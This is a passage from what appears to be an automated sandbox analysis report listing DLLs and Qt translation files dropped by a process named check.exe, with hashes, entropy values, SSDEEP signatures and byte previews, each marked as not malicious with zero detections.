                                                                                                                                                                                                                                      SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):30192
                                                                                                                                                                                                                                      Entropy (8bit):5.938644231596902
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                                                      MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                                                      SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                                                      SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                                                      SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):510448
                                                                                                                                                                                                                                      Entropy (8bit):6.605517748735854
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                                                      MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                                                      SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                                                      SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                                                      SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):844784
                                                                                                                                                                                                                                      Entropy (8bit):6.625808732261156
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                                                      MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                                                      SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                                                      SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                                                      SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):754672
                                                                                                                                                                                                                                      Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                                                      MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                                                      SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                                                      SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                                                      SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):482288
                                                                                                                                                                                                                                      Entropy (8bit):6.152380961313931
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                                                      MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                                                      SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                                                      SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                                                      SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1477104
                                                                                                                                                                                                                                      Entropy (8bit):6.575113537540671
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                                                      MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                                                      SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                                                      SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                                                      SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68592
                                                                                                                                                                                                                                      Entropy (8bit):6.125954940500008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                                                      MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                                                      SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                                                      SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                                                      SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):144368
                                                                                                                                                                                                                                      Entropy (8bit):6.294675868932723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                                                      MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                                                      SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                                                      SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                                                      SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130
                                                                                                                                                                                                                                      Entropy (8bit):4.024232093209084
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                                                      MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                                                      SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                                                      SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                                                      SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                                                      MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                                                      SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                                                      SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                                                      SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.631479835393124
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                                                      MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                                                      SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                                                      SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                                                      SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                                                      MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                                                      SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                                                      SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                                                      SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                                                      MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                                                      SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                                                      SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                                                      SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                                                      MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                                                      SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                                                      SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                                                      SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                                                      MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                                                      SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                                                      SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                                                      SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):293121
                                                                                                                                                                                                                                      Entropy (8bit):5.272179385890926
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                                                      MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                                                      SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                                                      SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                                                      SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117
                                                                                                                                                                                                                                      Entropy (8bit):3.739162292019161
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                                                      MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                                                      SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                                                      SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                                                      SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.680458675741643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                                                      MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                                                      SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                                                      SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                                                      SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                                      Entropy (8bit):4.463523104731333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                                                      MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                                                      SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                                                      SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                                                      SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):323590
                                                                                                                                                                                                                                      Entropy (8bit):4.568068046062524
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                                                      MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                                                      SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                                                      SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                                                      SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83
                                                                                                                                                                                                                                      Entropy (8bit):3.880645689209568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                                                      MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                                                      SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                                                      SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                                                      SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8743
